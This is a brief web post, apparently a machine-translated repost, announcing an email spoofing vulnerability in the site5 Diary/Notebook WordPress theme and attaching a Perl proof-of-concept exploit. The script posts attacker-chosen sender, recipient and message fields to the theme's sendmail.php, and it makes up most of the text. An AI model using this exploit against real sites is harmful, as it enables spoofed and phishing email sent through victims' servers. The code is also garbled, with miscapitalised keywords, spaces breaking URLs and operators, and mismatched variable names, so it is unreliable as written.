Wordpress Diary/Notebook subject email Spoofing Vulnerability

This Diary/Notebook topic of WordPress is a personal Diary blog system topic designed by site5. The e-mail spoofing vulnerability has recently been detected. The Exp of the perl script is attached:
 
 
 
#! /Usr/bin/perl
 
# Exploit Title: Diary/Notebook Site5 WordPress Theme-Email Spoofing
 
# Date: 15.07.2012
 
# Exploit Author: @ bwallHatesTwits
 
# Discovered by: @ xxDigiPxx (http://www.ticktockcomputers.com/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing)
 
# Software Link: http://www.wpdiarytheme.com/
 
# Vendor Homepage: http://www.site5.com/
 
# Others Possibly Vulnerable: http://www.site5.com/wordpress-themes/
 
# Version: Not supported ented
 
# Tested on: Linux 3.2
 
Use strict;
 
Use warnings; www.2cto.com
 
Use LWP: UserAgent;
 
Use HTTP: Request: Common qw {POST };
 
# Change this to the root of the WordPress
 
My $ wordpress = 'HTTP: // localhost/wordpress /';
 
My $ url = $ wordpress. 'wp-content/themes/diary/sendmail. php ';
 
# Name shows up in the topic of the email (Website contact message from name)
 
My $ name = 'proof of concept ';
 
# Sender email address
 
My $ email = 'sender @ mail.com ';
 
# Content of the email
 
My $ comment = 'email content ';
 
# Receiver email address
 
My $ worker ER = 'worker er @ mail.com ';
 
$ Cycler = ~ S/(.)/sprintf ("% x", ord ($1)/eg;
 
My $ ua = LWP: UserAgent-> new ();
 
My $ request = POST ($ url, [name => $ name, email => $ email, comment => $ comment, Referer => $ Referer, submit => 'submit ',]);
 
Print "Sending request to $ url \ n ";
 
My $ content = $ ua-> request ($ request)-> as_string ();
 
Print $ content;
 
Print "\ nDone \ nFollow \ @ BallastSec on Twitter \ n ";
 
 
Author Niu x ADMA